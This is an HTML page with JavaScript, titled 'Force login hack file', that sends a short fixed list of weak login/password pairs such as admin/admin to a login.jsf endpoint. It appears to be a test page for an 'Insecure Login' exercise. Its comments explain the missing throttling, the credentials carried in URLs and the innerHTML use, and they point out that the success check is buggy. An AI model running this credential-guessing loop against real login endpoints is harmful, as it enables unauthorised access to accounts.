<html>
    <head>
        <title>Force login hack file:</title>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
        <script type="text/javascript">
            /**
             * Builds a plain record holding one login/password pair.
             * Works with or without `new`, because an object is returned explicitly.
             *
             * @param {string} login    account name
             * @param {string} password password paired with that account
             * @returns {{login: string, password: string}} the pair as an object
             */
            function person(login, password){
                var record = {};
                record.login = login;
                record.password = password;
                return record;
            }
            
            /**
             * Returns the fixed list of login/password pairs this page submits.
             *
             * Several entries reuse the account name as the password or use a
             * short common word; a password policy or deny-list applied when
             * accounts are created is what keeps such pairs from being valid.
             *
             * @returns {Array} six records produced by person()
             */
            function prepareData(){
                var credentials = [
                    ["admin", "admin"],
                    ["aaa", "aaa"],
                    ["user", "kasia12"],
                    ["skt", "pass"],
                    ["hello", "pass"],
                    ["zbyszko", "zbyszko"]
                ];
                // Constructed but not appended to the returned list.
                var spare = new person("aev", "afcf");
                var personArray = [];
                for (var k = 0; k < credentials.length; k++) {
                    personArray.push(new person(credentials[k][0], credentials[k][1]));
                }
                return personArray;
            }
            /**
             * Creates the browser's HTTP request object.
             *
             * Where window.ActiveXObject exists, the ActiveX ProgIDs are tried in
             * order (the author's stated reason: XMLHttpRequest in IE7 is broken).
             * If every ProgID throws, the function ends without a return value.
             * Otherwise a native XMLHttpRequest is returned when available, and
             * false when neither mechanism exists.
             *
             * @returns {Object|boolean|undefined} request object, false, or undefined
             */
            function ajaxRequest(){
                var progIds = ["Msxml2.XMLHTTP", "Microsoft.XMLHTTP"];
                if (!window.ActiveXObject) {
                    if (window.XMLHttpRequest) {
                        return new XMLHttpRequest();
                    }
                    return false;
                }
                var idx = 0;
                while (idx < progIds.length) {
                    try {
                        return new ActiveXObject(progIds[idx]);
                    } catch (ignored) {
                        // this ProgID is unavailable; fall through to the next one
                    }
                    idx++;
                }
            }
            
            /**
             * Click handler for the Start control: sends one login request per
             * credential pair returned by prepareData().
             *
             * Each pair is URL-encoded and placed in the query string of a GET to
             * login.jsf (logininput / passinput). Credentials carried in a URL are
             * typically written to server and proxy access logs and to browser
             * history; a login endpoint should accept them in a POST body only.
             *
             * Every iteration is a separate login attempt, issued back to back with
             * no delay, so server-side attempt throttling or account lockout on
             * login.jsf is the control that bounds this loop. Nothing on this page
             * shows whether the target applies either.
             *
             * Takes no arguments and returns nothing; output goes to #result,
             * alert() and the console.
             */
            function doIt() {
                var personArray = prepareData();
                
                for(var i=0; i<personArray.length; i++) {
                    var mygetrequest=new ajaxRequest();
                    // mygetrequest is a function-scoped var shared by all iterations, so
                    // this handler reads whichever request the variable holds when it
                    // fires, not necessarily the one it was attached to.
                    mygetrequest.onreadystatechange=function(){
                        if (mygetrequest.readyState==4){
                            // Accept HTTP 200, or any status when the page URL contains no 'http'.
                            if (mygetrequest.status==200 || window.location.href.indexOf('http')==-1){
                                // The response body is parsed as markup here; assigning it to
                                // textContent instead would display it inertly.
                                document.getElementById('result').innerHTML = mygetrequest.responseText;
                            }
                            else{
                                alert('An error has occured making the request: ' + mygetrequest.status);
                            }
                        }
                    }; 
                    // Encoding keeps the values from breaking the query string; it does
                    // not keep them out of the request URL.
                    var login=encodeURIComponent(personArray[i].login);
                    var password=encodeURIComponent(personArray[i].password);
                    // Third argument true: the request is asynchronous.
                    mygetrequest.open('GET', 'login.jsf?logininput=' + login + '&passinput=' + password, true);
                    mygetrequest.send(null);
                    
                    //console.log(login + " " + password);
                    //console.log(mygetrequest);
//                    var div = document.createElement('div');
//                    div.setAttribute("name", login);
//                    div.innerHTML = mygetrequest.responseText;
//                    document.body.appendChild(div);
                    //document.getElementById('result').appendChild(txt); 
                                 // Read immediately after send() on an asynchronous request,
                                 // i.e. without waiting for the readystatechange handler above.
                                 var z = mygetrequest.responseText;
                                // z1 is true when that text contains the substring "false".
                                var z1 = z.indexOf("false") !== -1 ? true : false ;
                                //z.getElementsByTagName("body");
                                // Logs the loop index and the flag.
                                console.log(i + " -> "+ z1);
                }
            }
        </script>
    </head>
    <body>
        <!-- Test page: the Start control runs doIt(), which submits a fixed list of login/password pairs to login.jsf. -->

        <h1>Insecure Login: </h1>
        <input type="submit" value="Start" onclick="doIt()"/>

        <!-- doIt() assigns the response body to this element through innerHTML, so it is parsed as markup. -->
        <div id="result"></div> 
    </body>
</html>
